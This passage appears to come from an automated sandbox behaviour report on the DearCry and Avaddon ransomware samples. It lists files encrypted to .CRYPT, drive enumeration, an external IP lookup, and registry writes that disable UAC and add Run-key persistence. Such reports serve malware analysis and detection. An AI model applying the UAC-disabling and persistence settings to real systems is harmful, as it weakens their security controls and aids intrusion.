File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-3294248377-1418901787-4083263181-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3294248377-1418901787-4083263181-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ER80V8JZ\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JN4P46FI\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libvpx_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\video_output\libvmem_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\ContactPicker.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL093.XML.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gl.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\msadco.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPreviewTemplate.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OCRVC.DAT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\avtransport.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Mozilla Firefox\lgpllibs.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\VSTARemotingServer.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewFrame.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsVersion1Warning.htm C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Conversion.v3.5.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MAPIR.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libdav1d_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.Royale.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Mail\wabimp.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\WindowsBase.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\VVIEWRES.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\weather.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\System.IdentityModel.Selectors.Resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\librawvideo_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1041\hxdsui.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts2.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\VVIEWER.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\FeedSync.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\PresentationFramework.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\7-Zip\7zFM.exe.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Renames multiple (169) files with added filename extension

ransomware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-47134698-4092160662-1261813102-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
